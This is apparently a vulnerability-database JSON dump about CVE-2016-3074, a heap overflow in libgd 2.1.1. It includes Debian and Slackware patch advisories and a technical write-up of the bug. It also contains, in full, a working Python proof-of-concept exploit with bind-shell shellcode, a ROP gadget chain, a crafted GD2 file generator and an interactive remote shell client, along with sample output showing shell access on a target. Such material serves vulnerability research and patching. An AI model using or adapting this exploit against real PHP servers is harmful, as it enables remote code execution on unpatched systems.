\ndef get_args(): \np = argparse.ArgumentParser() \np.add_argument(\"--threads\", type=int, default=20) \np.add_argument(\"--bind-port\", type=int, default=8000) \np.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2) \np.add_argument(\"url\") \nreturn p.parse_args() \n \n \ndef main(): \nargs = get_args() \nhost = urlparse.urlparse(args.url).netloc.split(\":\")[0] \n \nprint(\"[*] this may take a while\") \nfor i in range(args.offsets[0], args.offsets[1]): \nsys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1])) \nsys.stdout.flush() \n \nvalid = zlib.compress(\"A\" * 100, 0) \npayload = get_payload(i, args.bind_port) \ngd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)]) \n \nthreads = [] \ncode = [] \nfor _ in range(args.threads): \nt = threading.Thread(target=send_gd2, args=(args.url, gd2, code)) \nt.start() \nthreads.append(t) \n \nfor t in threads: \nt.join() \n \nif 404 in code: \nsys.exit(\"\\n[-] 404: %s\" % args.url) \nconnect(host, args.bind_port) \n \nprint(\"\\n[-] nope...\") \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136757/libgd-signedness.txt"}], "seebug": [{"lastseen": "2017-11-19T12:02:13", "description": "## Vulnerability details\n\nRepresents the block index size of 4 bytes is stored in a signed integer.\n\nchunkIdx[i]. size by gdGetInt()to resolve the GD2 head during\n\nlibgd-2.1.1/src/gd_gd2. c:\n\n`,---- | 53 typedef struct { | 54 int offset; | 55 int size; | 56 } | 57 t_chunk_info; `----`\n\nlibgd-2.1.1/src/gd_gd2. c:\n\n`,---- | 65 static int | 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, | 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, | 68 t_chunk_info ** chunkIdx) | 69 { | ... | 73 t_chunk_info *cidx; | ... | 155 if (gd2_compressed (*fmt)) { | ... | 163 for (i = 0; i < nc; i++) { | ... | 167 if (gdGetInt (&cidx[i]. size, in) != 1) { | 168 goto fail2; | 169 }; | 170 }; | 171 *chunkIdx = cidx; | 172 }; | ... | 181 } `----` gdImageCreateFromGd2Ctx()and gdImageCreateFromGd2PartCtx()then Based on the maximum block size value for the compressed data in the allocated memory.\n\nlibgd-2.1.1/src/gd_gd2. c:\n\n`,---- | 371/637 if (gd2_compressed (fmt)) { | 372/638 /* Find the maximum compressed chunk size. */ | 373/639 compMax = 0; | 374/640 for (i = 0; (i < nc); i++) { | 375/641 if (chunkIdx[i]. size > compMax) { | 376/642 compMax = chunkIdx[i]. size; | 377/643 }; | 378/644 }; | 379/645 compMax++; | ...|... | 387/656 compBuf = gdCalloc (compMax, 1); | ...|... | 393/661 }; `----`\n\nSize less than or equal to 0 as a result of compMax during the cycle retains its initial value, then incremented to 1.\n\nDue to the compMax is used as a gdCalloc()with nmemb,it will lead to compBuf of 1*1 byte allocated.\n\nThis is followed by the compressed data is read out to the based on the current block size compBuf: the\n\nlibgd-2.1.1/src/gd_gd2. c:\n\n`,---- | 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) | 340 { | ... | 413 if (gd2_compressed (fmt)) { | 414 | 415 chunkLen = chunkMax; | 416 | 417 if (! _gd2ReadChunk (chunkIdx[chunkNum]. offset, | 418 compBuf, | 419 chunkIdx[chunkNum]. size, | 420 (char *) chunkBuf, &chunkLen, in)) { | 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\")); | 422 goto fail; | 423 }; | 424 | 425 chunkPos = 0; | 426 }; | ... | 501 } `----` libgd-2.1.1/src/gd_gd2. c:\n\n`,---- | 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) | 586 { | ... | 713 if (! gd2_compressed (fmt)) { | ... | 731 } else { | 732 chunkNum = cx + cy * ncx; | 733 | 734 chunkLen = chunkMax; | 735 if (! _gd2ReadChunk (chunkIdx[chunkNum]. offset, | 736 compBuf, | 737 chunkIdx[chunkNum]. size, | 738 (char *) chunkBuf, &chunkLen, in)) { | 739 printf (\"Error reading comproessed chunk\\n\"); | 740 goto fail2; | 741 }; | ... | 746 }; | ... | 815 } `----`\n\nAccording to the Read images, The size is then interpreted as fread()or memcpy()of size_t: the\n\nlibgd-2.1.1/src/gd_gd2. c:\n\n`` ,---- | 221 static int | 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, | 223 uLongf * chunkLen, gdIOCtx * in) | 224 { | ... | 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { | 237 return FALSE; | 238 }; | ... | 251 }`\\----\n\nlibgd-2.1.1/src/gd_io. c: ,---- | 211 int gdGetBuf(void _buf, int size, gdIOCtx _ctx) | 212 { | 213 return (ctx->getBuf)(ctx, buf, size); | 214 } `---- `` For file contexts:\n\nlibgd-2.1.1/src/gd_io_file. c:\n\n`,---- | 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) | 53 { | ... | 67 ctx->ctx. getBuf = fileGetbuf; | ... | 76 } | ... | 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) | 93 { | 94 fileIOCtx *fctx; | 95 fctx = (fileIOCtx *)ctx; | 96 | 97 return (fread(buf, 1, size, fctx->f)); | 98 } `----` And for dynamic contexts:\n\nlibgd-2.1.1/src/gd_io_dp. c:\n\n`,---- | 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) | 75 { | ... | 95 ctx->ctx. getBuf = dynamicGetbuf; | ... | 104 } | ... | 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) | 257 { | ... | 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); | ... | 284 } `----`\n", "published": "2017-01-18T00:00:00", "type": "seebug", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2017-01-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92626", "id": "SSV:92626", "sourceData": "\n ```\r\n#!/usr/bin/env python2\r\n#\r\n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and\r\n# php5-fpm running behind nginx.\r\n#\r\n# ,----\r\n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n# | [*] this may take a while\r\n# | [*] offset 912 of 10000...\r\n# | [+] connected to 1.2.3.4:5555\r\n# | id\r\n# | uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n# |\r\n# | uname -a\r\n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n# | 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n# |\r\n# | dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n# |\r\n# | cat upload.php\r\n# | <?php\r\n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n# | ?>\r\n# `----\r\n#\r\n# - Hans Jerry Illikainen\r\n#\r\nimport sys\r\nimport os\r\nimport zlib\r\nimport socket\r\nimport threading\r\nimport argparse\r\nimport urlparse\r\nfrom struct import pack\r\n\r\nimport requests\r\n\r\n# non-optimized bindshell from binjitsu\r\n#\r\n# context(arch=\"amd64\", os=\"linux\")\r\n# asm(shellcraft.bindsh(port, \"ipv4\"))\r\nshellcode = [\r\n \"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\",\r\n \"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\",\r\n \"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\",\r\n \"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\",\r\n \"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\",\r\n \"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\",\r\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\",\r\n \"\\xe7\\x31\\xf6\\x99\\x0f\\x05\"\r\n]\r\n\r\ngadgets = [\r\n \"\\x90\" * 40,\r\n\r\n # [16]\r\n #\r\n # 0xb6eca2: popfq\r\n # 0xb6eca3: callq *%rsp\r\n pack(\"<Q\", 0xb6eca2),\r\n\r\n \"%(pad)s\",\r\n\r\n # [2]\r\n #\r\n # 0x4dbe8c: add $0xd8,%rsp\r\n # 0x4dbe93: retq\r\n pack(\"<Q\", 0x4dbe8c),\r\n\r\n \"\\x90\" * 48,\r\n\r\n # [1]\r\n #\r\n # (gdb) x/x {void *}($rsp + 8)\r\n # 0x12d7d60: 0x9090909090909090\r\n #\r\n # 0xa91f35: rex.WXB pop %r14\r\n # 0xa91f37: mov $0x3,%bh\r\n # 0xa91f39: pop %rsp\r\n # 0xa91f3a: retq\r\n pack(\"<Q\", 0xa91f35),\r\n\r\n \"\\x90\" * 152,\r\n\r\n # [0]\r\n #\r\n # (gdb) x/i $rip\r\n # => 0x7f91acf61f46: callq *0x70(%rax)\r\n #\r\n # (gdb) x/gx 0x432b80\r\n # 0x432b80: 0x0000000000547880\r\n #\r\n # (gdb) x/3i 0x0000000000547880\r\n # 0x547880: push %rbx\r\n # 0x547881: mov %rdi,%rbx\r\n # 0x547884: callq *0x20(%rdi)\r\n pack(\"<Q\", 0x432b80 - 0x70),\r\n\r\n # [3]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n\r\n # [7]\r\n #\r\n # 0x463b1d: pop %r12\r\n # 0x463b1f: retq\r\n pack(\"<Q\", 0x463b1d),\r\n\r\n # [4]\r\n #\r\n # 0x473053: pop %rax\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n\r\n # [6]\r\n #\r\n # 0xa8bc37: push %rdx\r\n # 0xa8bc38: jmpq *%rbx\r\n pack(\"<Q\", 0xa8bc37),\r\n\r\n # [5]\r\n #\r\n # 0x7b2eaf: mov %r9,%rdx\r\n # 0x7b2eb2: jmpq *%rax\r\n pack(\"<Q\", 0x7b2eaf),\r\n\r\n # [8]\r\n #\r\n # 0x552768: mov %rdi,%rax\r\n # 0x55276b: retq\r\n pack(\"<Q\", 0x552768),\r\n\r\n # [9]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n pack(\"<Q\", 0xfffff000),\r\n\r\n # [10]\r\n #\r\n # 0xb6c734: and %ebx,%eax\r\n # 0xb6c736: es retq\r\n pack(\"<Q\", 0xb6c734),\r\n\r\n # [11]\r\n #\r\n # 0x4c93e9: xchg %eax,%ebx\r\n # 0x4c93ea: retq\r\n pack(\"<Q\", 0x4c93e9),\r\n\r\n # [12]\r\n #\r\n # 0x406a08: pop %rcx (len, 0x5555)\r\n # 0x406a09: retq\r\n pack(\"<Q\", 0x406a08),\r\n pack(\"<Q\", 0x5555),\r\n\r\n # [13]\r\n #\r\n # 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC)\r\n # 0xaf58fe: retq\r\n pack(\"<Q\", 0xaf58fd),\r\n pack(\"<Q\", 7),\r\n\r\n # [14]\r\n #\r\n # 0x473053: pop %rax (mprotect)\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n pack(\"<Q\", 125),\r\n\r\n # [15]\r\n #\r\n # 0x53f9f8: int $0x80\r\n # 0x53f9fa: mov 0x38(%r12),%rsi\r\n # 0x53f9ff: mov $0x8f,%edi\r\n # 0x53fa04: callq *0x28(%r12)\r\n pack(\"<Q\", 0x53f9f8),\r\n\r\n \"\\x90\" * 100,\r\n]\r\n\r\n# gd.h: #define gdMaxColors 256\r\ngd_max_colors = 256\r\n\r\n\r\ndef make_gd2(chunks):\r\n gd2 = [\r\n \"gd2\\x00\", # signature\r\n pack(\">H\", 2), # version\r\n pack(\">H\", 1), # image size (x)\r\n pack(\">H\", 1), # image size (y)\r\n pack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80)\r\n pack(\">H\", 2), # format (GD2_FMT_COMPRESSED)\r\n pack(\">H\", 1), # num of chunks wide\r\n pack(\">H\", len(chunks)) # num of chunks high\r\n ]\r\n colors = [\r\n pack(\">B\", 0), # trueColorFlag\r\n pack(\">H\", 0), # im->colorsTotal\r\n pack(\">I\", 0), # im->transparent\r\n pack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i]\r\n ]\r\n\r\n offset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8\r\n for data, size in chunks:\r\n gd2.append(pack(\">I\", offset)) # cidx[i].offset\r\n gd2.append(pack(\">I\", size)) # cidx[i].size\r\n offset += size\r\n\r\n return \"\".join(gd2 + colors + [data for data, size in chunks])\r\n\r\n\r\ndef connect(host, port):\r\n addr = socket.gethostbyname(host)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((addr, port))\r\n except socket.error:\r\n return\r\n\r\n print(\"\\n[+] connected to %s:%d\" % (host, port))\r\n if os.fork() == 0:\r\n while True:\r\n try:\r\n data = sock.recv(8192)\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\n[!] receiver aborting\")\r\n if data == \"\":\r\n sys.exit(\"[!] receiver aborting\")\r\n sys.stdout.write(data)\r\n else:\r\n while True:\r\n try:\r\n cmd = sys.stdin.readline()\r\n except KeyboardInterrupt:\r\n sock.close()\r\n sys.exit(\"[!] sender aborting\")\r\n sock.send(cmd)\r\n\r\n\r\ndef send_gd2(url, gd2, code):\r\n files = {\"file\": gd2}\r\n try:\r\n req = requests.post(url, files=files, timeout=5)\r\n code.append(req.status_code)\r\n except requests.exceptions.ReadTimeout:\r\n pass\r\n\r\n\r\ndef get_payload(offset, port):\r\n rop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset}\r\n\r\n fam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16)))\r\n sc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port}\r\n\r\n return rop + sc\r\n\r\n\r\ndef get_args():\r\n p = argparse.ArgumentParser()\r\n p.add_argument(\"--threads\", type=int, default=20)\r\n p.add_argument(\"--bind-port\", type=int, default=8000)\r\n p.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2)\r\n p.add_argument(\"url\")\r\n return p.parse_args()\r\n\r\n\r\ndef main():\r\n args = get_args()\r\n host = urlparse.urlparse(args.url).netloc.split(\":\")[0]\r\n\r\n print(\"[*] this may take a while\")\r\n for i in range(args.offsets[0], args.offsets[1]):\r\n sys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1]))\r\n sys.stdout.flush()\r\n\r\n valid = zlib.compress(\"A\" * 100, 0)\r\n payload = get_payload(i, args.bind_port)\r\n gd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)])\r\n\r\n threads = []\r\n code = []\r\n for _ in range(args.threads):\r\n t = threading.Thread(target=send_gd2, args=(args.url, gd2, code))\r\n t.start()\r\n threads.append(t)\r\n\r\n for t in threads:\r\n t.join()\r\n\r\n if 404 in code:\r\n sys.exit(\"\\n[-] 404: %s\" % args.url)\r\n connect(host, args.bind_port)\r\n\r\n print(\"\\n[-] nope...\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92626"}], "debian": [{"lastseen": "2020-08-12T00:57:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3556-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libgd2\nCVE ID : CVE-2016-3074\nDebian Bug : 822242\n\nHans Jerry Illikainen discovered that libgd2, a library for programmatic\ngraphics creation and manipulation, suffers of a signedness\nvulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2016-04-24T10:29:47", "published": "2016-04-24T10:29:47", "id": "DEBIAN:DSA-3556-1:CAE3D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00132.html", "title": "[SECURITY] [DSA 3556-1] libgd2 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T01:10:21", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4540", "CVE-2016-4538", "CVE-2013-7456", "CVE-2016-4544", "CVE-2016-4543", "CVE-2016-4542", "CVE-2016-4541", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-3074", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-4537"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3602-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2013-7456 CVE-2016-3074 CVE-2016-4537 CVE-2016-4538\n CVE-2016-4539 CVE-2016-4540 CVE-2016-4541 CVE-2016-4542\n CVE-2016-4543 CVE-2016-4544 CVE-2016-5093 CVE-2016-5094\n CVE-2016-5095 CVE-2016-5096\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.22, which includes additional bug fixes. Please refer to the\nupstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.6.21\nhttps://php.net/ChangeLog-5.php#5.6.22\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.22+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-06-14T15:44:13", "published": "2016-06-14T15:44:13", "id": "DEBIAN:DSA-3602-1:52B21", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00180.html", "title": "[SECURITY] [DSA 3602-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:59", "description": "\nlibgd 2.1.1 - Signedness Heap Overflow", "edition": 1, "published": "2016-04-26T00:00:00", "title": "libgd 2.1.1 - Signedness Heap Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "EXPLOITPACK:1108993BC3B3774C486440F61128433E", "href": "", "sourceData": "Overview\n========\n\nlibgd [1] is an open-source image library. It is perhaps primarily used\nby the PHP project. It has been bundled with the default installation\nof PHP since version 4.3 [2].\n\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\nmay result in a heap overflow when processing compressed gd2 data.\n\n\nDetails\n=======\n\n4 bytes representing the chunk index size is stored in a signed integer,\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 53 typedef struct {\n| 54 int offset;\n| 55 int size;\n| 56 }\n| 57 t_chunk_info;\n`----\n\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 65 static int\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\n| 68 t_chunk_info ** chunkIdx)\n| 69 {\n| ...\n| 73 t_chunk_info *cidx;\n| ...\n| 155 if (gd2_compressed (*fmt)) {\n| ...\n| 163 for (i = 0; i < nc; i++) {\n| ...\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\n| 168 goto fail2;\n| 169 };\n| 170 };\n| 171 *chunkIdx = cidx;\n| 172 };\n| ...\n| 181 }\n`----\n\n\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\nallocates memory for the compressed data based on the value of the\nlargest chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 371|637 if (gd2_compressed (fmt)) {\n| 372|638 /* Find the maximum compressed chunk size. */\n| 373|639 compMax = 0;\n| 374|640 for (i = 0; (i < nc); i++) {\n| 375|641 if (chunkIdx[i].size > compMax) {\n| 376|642 compMax = chunkIdx[i].size;\n| 377|643 };\n| 378|644 };\n| 379|645 compMax++;\n| ...|...\n| 387|656 compBuf = gdCalloc (compMax, 1);\n| ...|...\n| 393|661 };\n`----\n\n\nA size of <= 0 results in `compMax' retaining its initial value during\nthe loop, followed by it being incremented to 1. Since `compMax' is\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\nfor `compBuf'.\n\nThis is followed by compressed data being read to `compBuf' based on the\ncurrent (potentially negative) chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\n| 340 {\n| ...\n| 413 if (gd2_compressed (fmt)) {\n| 414\n| 415 chunkLen = chunkMax;\n| 416\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\n| 418 compBuf,\n| 419 chunkIdx[chunkNum].size,\n| 420 (char *) chunkBuf, &chunkLen, in)) {\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\n| 422 goto fail;\n| 423 };\n| 424\n| 425 chunkPos = 0;\n| 426 };\n| ...\n| 501 }\n`----\n\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\n| 586 {\n| ...\n| 713 if (!gd2_compressed (fmt)) {\n| ...\n| 731 } else {\n| 732 chunkNum = cx + cy * ncx;\n| 733\n| 734 chunkLen = chunkMax;\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\n| 736 compBuf,\n| 737 chunkIdx[chunkNum].size,\n| 738 (char *) chunkBuf, &chunkLen, in)) {\n| 739 printf (\"Error reading comproessed chunk\\n\");\n| 740 goto fail2;\n| 741 };\n| ...\n| 746 };\n| ...\n| 815 }\n`----\n\n\nThe size is subsequently interpreted as a size_t by `fread()' or\n`memcpy()', depending on how the image is read:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 221 static int\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\n| 223 uLongf * chunkLen, gdIOCtx * in)\n| 224 {\n| ...\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\n| 237 return FALSE;\n| 238 };\n| ...\n| 251 }\n`----\n\nlibgd-2.1.1/src/gd_io.c:\n,----\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\n| 212 {\n| 213 return (ctx->getBuf)(ctx, buf, size);\n| 214 }\n`----\n\n\nFor file contexts:\n\nlibgd-2.1.1/src/gd_io_file.c:\n,----\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\n| 53 {\n| ...\n| 67 ctx->ctx.getBuf = fileGetbuf;\n| ...\n| 76 }\n| ...\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\n| 93 {\n| 94 fileIOCtx *fctx;\n| 95 fctx = (fileIOCtx *)ctx;\n| 96\n| 97 return (fread(buf, 1, size, fctx->f));\n| 98 }\n`----\n\n\nAnd for dynamic contexts:\n\nlibgd-2.1.1/src/gd_io_dp.c:\n,----\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\n| 75 {\n| ...\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\n| ...\n| 104 }\n| ...\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\n| 257 {\n| ...\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\n| ...\n| 284 }\n`----\n\n\nPoC\n===\n\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\n\n,----\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\n| [*] this may take a while\n| [*] offset 912 of 10000...\n| [+] connected to 1.2.3.4:5555\n| id\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\n| \n| uname -a\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\n| \n| dpkg -l|grep -E \"php5-(fpm|gd)\"\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\n| \n| cat upload.php\n| <?php\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\n| ?>\n`----\n\n\nSolution\n========\n\nThis bug has been fixed in git HEAD [4].\n\nFull Proof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39736.zip\n\nFootnotes\n_________\n\n[1] [http://libgd.org/]\n[2] [https://en.wikipedia.org/wiki/Libgd]\n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.6.21-i486-1_slack14.1.txz: Upgraded.\n This release fixes bugs and security issues.\n For more information, see:\n http://php.net/ChangeLog-5.php#5.6.21\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.21-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.21-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.21-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.21-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.21-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.21-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nbf19a4472daa4fb81efe40f08bdd28b1 php-5.6.21-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n448ab59bade7a084d392177de2514ecf php-5.6.21-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd9e0a2107e010470676da690cd767f87 php-5.6.21-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc01a13118b9803686487df2673cba58a php-5.6.21-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n9bd2f2fdf8512763550562ed7efcb996 n/php-5.6.21-i586-1.txz\n\nSlackware x86_64 -current package:\n6d5a5d3075daffd829f4cde051a7e099 n/php-5.6.21-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.6.21-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2016-04-29T21:57:42", "published": "2016-04-29T21:57:42", "id": "SSA-2016-120-02", "href": 